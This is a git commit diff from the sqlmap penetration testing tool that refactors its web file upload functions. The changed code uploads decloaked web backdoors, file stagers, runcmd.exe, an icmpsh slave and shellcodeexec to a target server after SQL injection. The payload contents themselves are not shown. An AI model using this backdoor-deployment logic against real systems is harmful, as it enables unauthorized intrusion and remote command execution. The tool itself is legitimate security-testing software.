sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Cleaning some (web upload based) garbage

Browse Source
This commit is contained in:
Miroslav Stampar 2012-12-13 13:19:47 +01:00
parent 5150172178
commit df0f08bc6a
6 changed files with 26 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/controller/checks.py
View File

@ -12,7 +12,6 @@ import re
import socket
import time
from subprocess import PIPE
from subprocess import Popen as execute
from extra.beep.beep import beep

9
lib/core/common.py
View File

@ -38,7 +38,6 @@ from subprocess import Popen as execute
from xml.dom import minidom
from xml.sax import parse
from extra.cloak.cloak import decloak
from extra.safe2bin.safe2bin import safecharencode
from lib.core.bigarray import BigArray
from lib.core.data import conf
@ -1416,14 +1415,6 @@ def showStaticWords(firstPage, secondPage):
logger.info(infoMsg)
def decloakToNamedStream(filepath, name=None):
class _(StringIO):
__len__ = property(lambda self: self.len)
retVal = _(decloak(filepath))
retVal.name = name
return retVal
def isWindowsPath(filepath):
"""
Returns True if given filepath is in Windows format

2
lib/takeover/icmpsh.py
View File

@ -77,7 +77,7 @@ class ICMPsh:
logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)
if web:
self.webFileUpload(self.__icmpslave, self._icmpslaveRemote, self.webDirectory)
self.webUpload(self._icmpslaveRemote, self.webDirectory, filepath=self.__icmpslave)
else:
self.writeFile(self.__icmpslave, self._icmpslaveRemote, "binary")

6
lib/takeover/metasploit.py
View File

@ -545,9 +545,7 @@ class Metasploit:
else:
self.shellcodeexecLocal += "/linux/shellcodeexec.x%s" % Backend.getArch()
# TODO: until web.py's __webFileStreamUpload() method does not consider the destFileName
#__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
__basename = os.path.basename(self.shellcodeexecLocal)
__basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "")
if web:
self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename)
@ -559,7 +557,7 @@ class Metasploit:
logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote)
if web:
self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
self.webUpload(self.shellcodeexecRemote, self.webDirectory, filepath=self.shellcodeexecLocal)
else:
self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary")

47
lib/takeover/web.py
View File

@ -5,10 +5,10 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import codecs
import os
import posixpath
import re
import StringIO
from tempfile import mkstemp
@ -16,7 +16,6 @@ from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import decloakToNamedStream
from lib.core.common import extractRegexResult
from lib.core.common import getDirs
from lib.core.common import getDocRoot
@ -82,16 +81,25 @@ class Web:
return output
def webFileUpload(self, fileToUpload, destFileName, directory):
inputFP = codecs.open(fileToUpload, "rb")
retVal = self._webFileStreamUpload(inputFP, destFileName, directory)
inputFP.close()
return retVal
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
if filepath is not None:
if filepath.endswith('_'):
content = decloak(filepath) # cloaked file
else:
with open(filepath, "rb") as f:
content = f.read()
if content is not None:
stream = StringIO.StringIO(content) # string content
return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind
try:
setattr(stream, "name", destFileName)
except TypeError:
pass
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
@ -156,10 +164,7 @@ class Web:
break
if not default:
if Backend.isOs(OS.WINDOWS):
default = WEB_API.ASP
else:
default = WEB_API.PHP
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
message = "which web application language does the web server "
message += "support?\n"
@ -190,8 +195,7 @@ class Web:
directories = sorted(getDirs())
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorStream = decloakToNamedStream(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
originalBackdoorContent = backdoorContent = backdoorStream.read()
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
@ -291,8 +295,6 @@ class Web:
logger.info(infoMsg)
if self.webApi == WEB_API.ASP:
runcmdName = "tmpe%s.exe" % randomStr(lowercase=True)
runcmdStream = decloakToNamedStream(os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'), runcmdName)
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match:
@ -300,21 +302,16 @@ class Web:
else:
continue
backdoorContent = originalBackdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", runcmdName)
backdoorStream.truncate()
backdoorStream.read()
backdoorStream.seek(0)
backdoorStream.write(backdoorContent)
if self._webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self._webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self._webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath):
if not self.webUpload(backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath, content=backdoorContent):
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "through the file stager possibly because "
warnMsg += "the user running the web server process "

2
thirdparty/multipart/multipartpost.py vendored
View File

@ -87,7 +87,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
for (key, fd) in files:
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
filename = fd.name.split('/')[-1]
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)